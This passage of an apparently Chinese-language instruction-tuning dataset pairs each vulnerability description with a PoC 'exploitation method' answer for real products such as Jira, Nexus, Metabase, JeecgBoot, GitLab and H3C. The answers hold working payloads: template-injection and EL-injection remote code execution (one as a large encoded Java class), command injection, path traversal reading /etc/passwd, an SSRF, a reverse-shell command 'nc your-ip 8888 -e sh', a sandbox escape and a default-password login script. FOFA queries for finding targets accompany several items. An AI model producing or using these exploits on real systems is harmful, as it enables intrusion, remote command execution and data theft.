"poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/KubePi JwtSigKey 登陆绕过漏洞 CVE-2023-22463.md"}
    828. 

  828. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Jira 模板注入漏洞 CVE-2019-11581\n漏洞描述:Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 参考资料: - https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html - https://jira.atlassian.com/browse/JRASERVER-69532 - https://mp.weixin.qq.com/s/d2yvSyRZXpZrPcAkMqArsw\n影响版本:多个版本前存在利用模板注入执行任意命令: - 4.4.x - 5.x.x - 6.x.x - 7.0.x - 7.1.x - 7.2.x - 7.3.x - 7.4.x - 7.5.x - 7.6.x before 7.6.14 (the fixed version for 7.6.x) - 7.7.x - 7.8.x - 7.9.x - 7.10.x - 7.11.x - 7.12.x - 7.13.x before 7.13.5 (the fixed version for 7.13.x) - 8.0.x before 8.0.3 (the fixed version for 8.0.x) - 8.1.x before 8.1.2 (the fixed version for 8.1.x) - 8.2.x before 8.2.3 (the fixed version for 8.2.x)\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-11581\n【POC利用方法】\n1. docker-compose up -d\n2. $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('calc').toString()\n3. $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('whoami').toString()\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Jira 模板注入漏洞 CVE-2019-11581.md"}
    829. 

  829. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nexus Repository Manger group 后台远程命令执行 CVE-2020-10199\n漏洞描述:Nexus 后台存在一处任意EL表达式注入漏洞,只需要任意一个用户权限即可\n影响版本:``` Nexus < 3.21.1 ```\n网络测绘:app=\"Nexus-Repository-Manager\"\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-10199\n【POC利用方法】\n1. Nexus < 3.21.1\n2. POST /service/rest/beta/repositories/go/group HTTP/1.1\nHost: \nConnection: keep-alive\nNX-ANTI-CSRF-TOKEN: 0.6153568974227819\nContent-Length: 4789\nX-Requested-With: XMLHttpRequest\nX-Nexus-UI: true\nContent-Type: application/json\n404: \"id\"\nCookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.6153568974227819; NXSESSIONID=66e8bf5f-0544-4d7d-b1d7-970ce5158aff\n\n\n{\n        \"name\": \"internal\",\n        \"online\": true,\n        \"storage\": {\n            \"blobStoreName\": \"default\",\n            \"strictContentTypeValidation\": true\n        },\n        \"group\": {\n            \"memberNames\": [\"${' '.getClass().forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$eb$7f$UW$Z$7eN$b2$d9$99L$s$9bd6$9bd$A$xH$80M$80$5dJ$81$96$e5bC$K$e5$S$u$924$YR$ad$93eH$W6$3b$db$d9$d9$Q$d0j$d1Z$ea$adVQ$yj$d1R5$de5$a2$h$q$82h$V$b5$9f$fc$ea7$3f$f6$_$e0$83$3f$7f$8d$cf$99$dd$N$d9d$5b$fc$R$ce$ceyo$e7y$df$f3$3e$ef$cc$db$ef$de$bc$N$60$L$fe$a1$n$IGAVC$N$9cz$$$cfI$89$ab$m$a7$e2i$Nm$f04$e41$n$97$b3$w$s$a5$e4$9c$8a$f3$K$86U$7cR$c5$a74t$e0y$v$fd$b4$8a$cfhX$81$XT$5cP$f0Y$v$fa$9c$82$X5$7c$k$_$a9$b8$a8$e2e$F_P$f1E$V_R$f1e$F_Q$f1$8a$8a$afjx$V_$93$cb$d7$V$5cR$f0$N$N$df$c4e$Nk$f1$z$Nk$f0$9a$82$x$g$ba$e1$c8$cd$b7$e5$d3wT$7cW$fe$be$aea$r$ae$ca$e5$7b$K$be$af$e0$N$81$a07$e6$da$d6I$B$a3$ef$b45a$c5$d3Vf4$3e$e0$cbvP$bb3$95Iy$bb$Fj$a3$5d$83$C$81$5e$e7$a4$z$d0$d4$97$ca$d8G$f2$e3$p$b6$3b$60$8d$a4m$e9$ec$q$ad$f4$a0$e5$a6$e4$be$q$Mxc$a9$9c$40C$9f$3d$91J$c7$e5$c2$88$ea$ced$ba$U3$b4$df$f3$b2$bdN$sc$t$bd$94$93$RhY$A$a17m$e5r$b4o$Y$93Fc$W$ad$d2$95$m$9f$g9MGi$b2$7f$a1$89$e2$da$cf$e5$ed$9cG$f0cL$c2v$x$bd$fa$3d7$95$Z$95$40$5c$3b$97u29$C$N$9euS$9e4$8c$U$NSN$fc$u$ad$bc$e3$be$98$b6$b5$c9qV$u$3c$5c$zNM$969$86$Xh$8e$baN$d2$f6$b1$d7$8c0f$c7$7c$cc$3d$f9S$a7l$d7$3ey$cc$87$r$f5$b9$91y$fd$82$a0E$3b$ea$D$ac$94$84G$a4$f94$T$K$8d$z$wX$d0$f1k$m$a0$Xo$d1$bf$F$c21$X$c4t$edSi$da$c4$f7$a5$ec$b4$bc$d2$d0$C$d3$c3V$96$d8$x$F$y$fc$f9$f3$C$9a$t$_$d1wbM$8b$e7$e4$W$d5$60$fe$G4$3b$e3$b9$e7$fc$xcw$f8$9bA$x$9d$_$bb$b7Uv$c7$b9l$b9CZ$X_$f8$ce$ee$dd$M$d7$d8$efY$c93$c4$e2$9b$91U$K$ae$91$V$q$I$d9$40$S$u8$a8$e0M$bf$f5$af$94$fbX$ebw$f2n$92$t$ca$b8$f5$b2$d9b2$b6$8emx$b4$q$f0$5bP$t$7f$b7$ea$f8$B$7e$u$d0$bc$b8$e3u$fc$IS$3cL$c7$8f$f1$T$j$3f$c5$cf$E$3a$a5QL$g$c5$G$ee$X$aas$a0$a2h$3a$7e$8e_$I$d4y$c5$bc$ba$ff$l$9f$ce$bd$b2Nt$9a$90$a5$d2$f1K$fcJ$c7$af1$z$b0$ceqGc6y$92$cd$d9$b1$d3$b6$e7$9d$8b$e5lw$c2vc$95$8c$d1$f1$h$5c$e7$8d$8e$da$5e$F$F$9a$WUU$c7o$f1$bb$8at$8b7$a7$a0$a0c$G7X$3d$868V$e6M$bd$8cW$a2N$f3$e2$e6$q$Z$b6l$daB$d2$f9$ke$GI$97$e3$r$S$85$abp$88$W$f1$91T$s$3eb$e5$c6$d8$f7$h$93$K$7e$af$e3$sfu$fc$B$b7$d8$n$d59$c2N$$$x$Od$b2y$8f$Qlk$bc$a8c$H$e8$b8$8d$3f$ca$h$be$p$97$3f$95$c3$y$a1$92$8e$3fcZ$c7$5b$f8$8b$80$d0t$fcU$ee$ee$e2o$3a$fe$$$9bc$e5$7d$af$D$e9$b4$3dj$a5$7b$92$92$c1$7b$t$93v$b6H$b4$f0$7d$93$F$d2$f6$f7$60$Z$t$d9$92q$c0$aeN$e6$5d$97$dc$Y$u$N$dc$d6hW$b5$91$db$ccR$3e$c1$cb$b7X$85R$b4$8d$d1$a5$83$a7$eb$7d$u$de$98$b3$bdb$K$a9$e2$m$8e$9e$90$d3$bb$96$91$F$d6F$972$b8$ab$g$a9$95S$8e$7b$c4$g$a7$ff$9a$H$9c_$9e$d5$w$P$u$N$81p$b4$9a$81B$83b$c8$ca$e4$e7$87i$90$3d$e8O$b0H5$94$t$8a$8dv$d8$f6$c6$i$96$e5$f1$w$b0$86$97$9cZ$adP$c5$I$3c$af$e3$bdt$84$92$caL8g$Iu$7b$V$uU$a6$60$d5$g$$$e8$83c$f9$8c$97$92$a9$fb$5c$xo$o$Vu$u$89$e5$e8$b7$t$ed$a4$404Z$e5$9d$d3U$f5e$p$a7$c0$C$92$b0$3b$cb$a1$x$d9$p$b3$8eVU$c8$k$J$dfW$95$5eSR$aa$fas$ab$f82$b2$b2Y$3b$c3$falx$40S$yz$97$a9$9eS$k$mu$fe$ebv$d1$j$97$p$f0$b4$bad$da$c9$d9X$c5$ef$aa$m$bf$b7X19$b3$f9T$c3g$8es$ae$8fq$X$e7$af$e0o$5d$f7$M$c4$b4$af$de$ce5$e8$LU$q$b8$eaE$D$ec$c0N_$b6$ab$ec$i$e8$a4$dd2$c6$7es$W5C3$a8$bd$8e$c0$N$d4$j2$82$86R$80$da$b7$3eP$40$fd$fa$ee$C$b4$c3F$c3$N$e8G6$g$8d$94$t$Cf$40j$cc$c0$G$aa$ee$m$c4$bfD$9d$d1D$8bD$d0$M$g$cd$d2F1$V$df$a6$$$a1$9a$ea$edm$f5$b5$db$b4$88$W$a9$bf$s$b6$9ajD$db$9ch0$h$ee$8a$d5$a6b60FB7$f5$bb$a2$d9$d4$Lh$v$c00$c2$F$b4$5e$e1$d8$93$fbD$a3$d9hDjo$a1$ad$80vS$e7CG$Bf$od$86$a4$b2$c9l2$96$95$95$a1$b2$b2$d9$q$86$Wcy$80$8a$a1ZcE$bf$d46s$d7$c1$dd$H$b83$ef$60E$a2$85$be$P$z$f15LC$fa$7e$b0$ac0J$8a$3bX$99$I$Hoa$FC$ac$ea$l$K$Y$l$ea$l$aa3$5b$fa$T$ad7$b0$dal$z$a03$R$99$c5$9a$a1Y$ac$j2$p$F$ac$9bAt$G$5d$89$b6Yt$b3$b6$eb$T$ed$s$e3m$YJt$dcE$d8l7$Zs$a3$R$e3r$7cj$ee$j$b3$bd$80x$c24$c3$a6Y$c0$s$93$f9$3f$3c$85$ba$84$fe$a2$s$a6$de$7d$7b$K$81C$d3$bc$d8IqI$5c$c6fh$e2$aax$D$8f$m$e0_$f5U$ac$e3Z$cf$fehD$IM$fcxn$c6r$84$d99m$d4t$b0CL$f6$cdr$f4$e2$n$i$e4Go$3f5CX$8d$i$3a1$c9$af$e5$L$b4z$JQ$5cF$X$5e$c7z$5c$c7$G$be$93b$f8$t6$e1$k$k$W$3a6$8b$u$k$R$bb$b0E$3c$89$ad$e2$Zl$T6$k$TYl$X$_$60$87$b8$88$5d$e2$V$ec$W$97$d0Kt$3d$e25$ac$WW$b1$9f$I$f7$89k$3cQ$b6$e0$3bhg$ec$7b$d8$8d$P$T$e5u$fc$h$8f$a3$87ho$e2_$d8CY$TO$7b$8b$I$7b$88$fd$k$z$9f$c0$5e$b4$f0$e4$8b$d8G$99$c1$f3$cf$e0I$ecG$98$u$Gq$80Q$5b$89$a5$P$87$f8$3fBD$8f$e20$8e$a0$8d$b8bx$KG$d1$$$c6$99$d9G$Y$a5$83$f8t$i$e3$93$89$L$c2$60$f6$3d$dc$e7$c4$g$M$f0$a9$B$n$f1j$89Wm$e2e$3c$cd$e8$C$ab$c4$f38Nm$N$d6$89$b3$f8$u$f1$d5$o$$$iVm$905$ef$V$c38$81a$S$ea$a0$Y$c03$d4$G$d1$_$O$e1c$d4$w$f8$b8$8cD$cfb$b6$cf2$dbb$8e$cf2$c7OP7$8d$fa9$d8hP$60$v$YQ$c0o$80$93$feCh$feA$90$aes$fc$d7$f1$be6$be$b8$a8$99_m$7f$3d$a5$60T$c1$98$82$94$82$d3$c0$7f$b1$8c$9a9$Y$d0$l$U$Q$d8$a3$e0$cc$7f$m$e6$98$j$fc$5dZ$8e$9eq$7f$aed$fe$H$c3$e0$Q$5e$fb$N$A$A').newInstance()}\"]\n        }\n}\n3. X-Nexus-UI: true\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Nexus Repository Manger group 后台远程命令执行 CVE-2020-10199.md"}
    830. 

  830. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:imo 云办公室 get_file.php 远程命令执行漏洞\n漏洞描述:imo 云办公室 /file/NDisk/get_file.php 过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限。\n影响版本:``` imo 云办公室 ```\n网络测绘:``` app=\"iMO-云办公室\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"iMO-云办公室\"\n2. <?php\n// 放置在 mfs 服务器上用于获取文件列表,配合 nd_verify_large_file.php 使用\nif(empty($_GET['cid']) || empty($_GET['nid']))\n\texit;\n$cid = $_GET['cid'];\n$nid = $_GET['nid'];\n$mainDir = dirname(__FILE__) . '/../upload/NDiskData/normal/' . $cid . '/';\nexec(\"ls {$mainDir}*_{$nid}_*\", $r);\n$ret = array();\nforeach($r as $v)\n\t$ret[md5_file($v)] = str_replace(dirname(__FILE__) . \"/../upload/NDiskData/normal/{$cid}/\", '', $v);\necho json_encode($ret);\n3. /file/NDisk/get_file.php?cid=1&nid=;pwd;\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/imo 云办公室 get_file.php 远程命令执行漏洞.md"}
    831. 

  831. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Airflow 默认密钥导致的权限绕过 CVE-2020-17526\n漏洞描述:Apache Airflow是一款开源的,分布式任务调度框架。默认情况下,Apache Airflow无需用户认证,但管理员也可以通过指定`webserver.authenticate=True`来开启认证。 在其1.10.13版本及以前,即使开启了认证,攻击者也可以通过一个默认密钥来绕过登录,伪造任意用户。 参考链接: - https://lists.apache.org/thread/rxn1y1f9fco3w983vk80ps6l32rzm6t0 - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-17526\n【POC利用方法】\n1. #初始化数据库\ndocker-compose run airflow-init\n\n#启动服务\ndocker-compose up -d\n2. curl -v http://localhost:8080/admin/airflow/login\n3. # 安装flask-unsign\npip install flask-unsign[wordlist]\n\n# 开始爆破\nflask-unsign -u -c [session from Cookie]\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Apache Airflow 默认密钥导致的权限绕过 CVE-2020-17526.md"}
    832. 

  832. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:AVCON6 系统管理平台 download.action 任意文件下载漏洞\n漏洞描述:AVCON6 系统管理平台 download.action 存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器任意文件\n影响版本:``` AVCON6 系统管理平台 ```\n网络测绘:``` app=\"AVCON-6\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. AVCON6 系统管理平台\n2. app=\"AVCON-6\"\n3. /download.action?filename=../../../../../../etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/AVCON6 系统管理平台 download.action 任意文件下载漏洞.md"}
    833. 

  833. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞\n漏洞描述:金山 V8 终端安全系统 pdf_maker.php 存在命令执行漏洞,由于没有过滤危险字符,导致构造特殊字符即可进行命令拼接执行任意命令\n影响版本:``` 金山 V8 终端安全系统 ```\n网络测绘:``` app=\"猎鹰安全-金山V8+终端安全系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 金山 V8 终端安全系统\n2. app=\"猎鹰安全-金山V8+终端安全系统\"\n3. Kingsoft\\Security Manager\\SystemCenter\\Console\\inter\\pdf_maker.php\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞.md"}
    834. 

  834. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WiseGiga NAS down_data.php 任意文件下载漏洞\n漏洞描述:WiseGiga 是一家销售网络连接存储(NAS )产品的韩国公司。 WISEGIGA NAS down_data.php 存在任意文件下载漏洞,由于 /down_data.php 页面 filename 参数过滤不严,导致可以读取系统敏感文件。\n影响版本:``` WiseGiga NAS ```\n网络测绘:``` app=\"WISEGIGA-NAS\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. WiseGiga NAS\n2. app=\"WISEGIGA-NAS\"\n3. /down_data.php?filename=../../../../../../../../../../../../../../etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/WiseGiga NAS down_data.php 任意文件下载漏洞.md"}
    835. 

  835. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Webgrind fileviewer.phtml 任意文件读取漏洞 CVE-2018-12909\n漏洞描述:Webgrind是一套PHP执行时间分析工具。其中Webgrind 1.5版本中存在安全漏洞,该漏洞源于程序依靠用户输入来显示文件。攻击者可以通过漏洞读取服务器敏感文件\n影响版本:``` Webgrind <= 1.5 ```\n网络测绘:``` app=\"Webgrind\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2018-12909\n【POC利用方法】\n1. Webgrind <= 1.5\n2. app=\"Webgrind\"\n3. /index.php?op=fileviewer&file=/etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Webgrind fileviewer.phtml 任意文件读取漏洞 CVE-2018-12909.md"}
    836. 

  836. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:JeecgBoot SSTI CVE-2023-4450\n漏洞描述:JeecgBoot 是一个开源的低代码开发平台,Jimureport 是低代码报表组件之一 当前漏洞在 1.6.1 以下的 Jimureport 组件库中都存在. 由于未授权的 API `/jmreport/queryFieldBySql` 使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生. 参考链接: - https://www.oscs1024.com/hd/MPS-4hzd-mb73 - https://www.reajason.eu.org/writing/freemarkersstimemshell - https://github.com/jeecgboot/JimuReport\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-4450\n【POC利用方法】\n1. docker compose up -d\n2. <#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"nc your-ip 8888 -e sh\")}\n3. <#assign value=\"freemarker.template.utility.ObjectConstructor\"?new()>${value(\"java.lang.ProcessBuilder\",\"calc\").start ()}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/JeecgBoot SSTI CVE-2023-4450.md"}
    837. 

  837. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:杭州法源软件 公证实务教学软件 SQL注入漏洞\n漏洞描述:杭州法源软件 公证实务教学软件 存在SQL注入漏洞\n影响版本:``` 杭州法源软件 公证实务教学软件 ```\n网络测绘:FOFA暂时未收录任何网站\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 杭州法源软件 公证实务教学软件\n2. POST /JusNotary/ HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nContent-Length: 219\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: ASP.NET_SessionId=54zwf05sd1g4zyfpiuxxdmuc\nx-forwarded-for: 127.0.0.1\nx-originating-ip: 127.0.0.1\nx-remote-ip: 127.0.0.1\nx-remote-addr: 127.0.0.1\nConnection: close\n\n__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTE5NTI5NDc1Ng8WAh4TVmFsaWRhdGVSZXF1ZXN0TW9kZQIBZGTTkYMK0k4DlIElq0ua0zvxEhpFH8rCzVrUscEhlVc9pw%3D%3D&__VIEWSTATEGENERATOR=1B0004A3&txtName=123&txtPwd=123&btnSubmit=+\n3. POST /JusNotary/ HTTP/1.1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/杭州法源软件 公证实务教学软件 SQL注入漏洞.md"}
    838. 

  838. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GitLab SSRF漏洞 CVE-2021-22214\n漏洞描述:GitLab存在前台未授权SSRF漏洞,未授权的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。\n影响版本:``` Gitlab > 10.5 ```\n网络测绘:``` app=\"GitLab\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-22214\n【POC利用方法】\n1. Gitlab > 10.5\n2. app=\"GitLab\"\n3. POST /api/v4/ci/lint HTTP/1.1\nHost: \nUser-Agent: python-requests/2.25.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nContent-Type: application/json\nContent-Length: 111\n\n{\"include_merged_yaml\": true, \"content\": \"include:\\n  remote: http://965qaw.dnslog.cn/api/v1/targets?test.yml\"}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/GitLab SSRF漏洞 CVE-2021-22214.md"}
    839. 

  839. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Metabase 未授权 JDBC 远程代码执行漏洞 CVE-2023-38646\n漏洞描述:Metabase是一个开源的数据分析平台。在其0.46.6版本及以前,存在一处远程代码执行漏洞,未授权的用户可以使用JDBC注入在服务器上执行任意代码。 参考链接: - https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/ - https://blog.calif.io/p/reproducing-cve-2023-38646-metabase - https://mp.weixin.qq.com/s/MgfIyq0OJwnKOUF2kBB7TA\n网络测绘:``` app=\"Metabase\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-38646\n【POC利用方法】\n1. app=\"Metabase\"\n2. docker compose up -d\n3. GET /api/session/properties HTTP/1.1\nHost: your-ip:3000\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36\nConnection: close\nCache-Control: max-age=0\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Metabase 未授权 JDBC 远程代码执行漏洞 CVE-2023-38646.md"}
    840. 

  840. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞\n漏洞描述:H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令\n影响版本:``` H3C SecParh堡垒机 ```\n网络测绘:``` app=\"H3C-SecPath-运维审计系统\" && body=\"2018\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. H3C SecParh堡垒机\n2. app=\"H3C-SecPath-运维审计系统\" && body=\"2018\"\n3. /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞.md"}
    841. 

  841. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:YApi 接口管理平台 后台命令执行漏洞\n漏洞描述:YApi 接口管理平台 后台存在命令执行漏洞,攻击者通过发送特定的请求可执行任意命令获取服务器权限\n影响版本:``` YApi 接口管理平台 ```\n网络测绘:``` app=\"YApi\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. YApi 接口管理平台\n2. const sandbox = this; // 获取Context\nconst ObjectConstructor = this.constructor; // 获取 Object 对象构造函数\nconst FunctionConstructor = ObjectConstructor.constructor; // 获取 Function 对象构造函数\nconst myfun = FunctionConstructor('return process'); // 构造一个函数,返回process全局变量\nconst process = myfun();\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()\n3. 创建后点击 高级Mock 输入如下Payload\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/YApi 接口管理平台 后台命令执行漏洞.md"}
    842. 

  842. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:中新金盾信息安全管理系统 默认超级管理员密码漏洞\n漏洞描述:中新网络信息安全股份有限公司中新金盾信息安全管理系统存在默认弱口令,登录身份为超级管理员 目前大部分使用的都受到了影响\n影响版本:``` 中新金盾信息安全管理系统 ```\n网络测绘:``` title=\"中新金盾信息安全管理系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 中新金盾信息安全管理系统\n2. title=\"中新金盾信息安全管理系统\"\n3. import requests\nimport sys\nimport random\nimport re\nimport base64\nimport time\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mGithub : https://github.com/PeiQi0                                 \\033[0m')\n    print('+  \\033[34m公众号  : PeiQi文库                                                   \\033[0m')\n    print('+  \\033[34mVersion: 中新金盾信息安全管理系统 默认超级管理员密码漏洞                      \\033[0m')\n    print('+  \\033[36m使用格式:  python3 poc.py                                            \\033[0m')\n    print('+  \\033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url):\n    vuln_url = target_url + \"?q=common/getcode\"\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n    }\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)\n        print(\"\\033[36m[o] 正在获取验证码 {}?q=common/getcode ..... \\033[0m\".format(target_url))\n        response_data = response.headers['Set-Cookie']\n        check_code = re.findall(r'check_code=(.*?);', response_data)[0]\n        PHPSESSID = re.findall(r'PHPSESSID=(.*?);', response_data)[0]\n        print(\"\\033[36m[o] 验证码:{}\\n[o] PHPSESSID:{} \\033[0m\".format(check_code, PHPSESSID))\n        POC_2(target_url, check_code, PHPSESSID)\n\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n\ndef POC_2(target_url, check_code, PHPSESSID):\n    vuln_url = target_url + \"?q=common/login\"\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n        \"Cookie\":\"PHPSESSID={}; check_code={}\".format(PHPSESSID, check_code),\n        \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\"\n    }\n    data = \"name=admin&password=zxsoft1234!%40%23%24&checkcode={}&doLoginSubmit=1\".format(check_code)\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)\n        if \"1\" in response.text and response.status_code == 200:\n            print(\"\\033[36m[o] 目标 {} 存在默认管理员弱口令 admin / zxsoft1234!@#$ \\033[0m\".format(target_url))\n        else:\n            print(\"\\033[31m[x] 目标 {} 不存在默认管理员弱口令     \\033[0m\".format(target_url))\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n\n\nif __name__ == '__main__':\n    title()\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl >>> \\033[0m\"))\n    POC_1(target_url)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/中新金盾信息安全管理系统 默认超级管理员密码漏洞.md"}
    843. 

  843. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:任我行 管家婆 订货易在线商城 SelectImage.aspx 任意文件上传漏洞\n漏洞描述:任我行率先针对中小企业推出了管家婆进销存、财务一体化软件。 管家婆订货易在线商城存在 SelectImage.aspx 任意文件上传漏洞,攻击者可通过该漏洞可控制整个系统,最终导致系统处于极度不安全状态。\n影响版本:管家婆 订货易在线商城\n网络测绘:``` title=\"订货易\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"订货易\"\n2. POST /DialogTemplates/SelectImage.aspx?type=titleimg&size=30*100&pageindex=1&iscallback=true HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\nAccept-Encoding: gzip\nContent-Type: multipart/form-data; 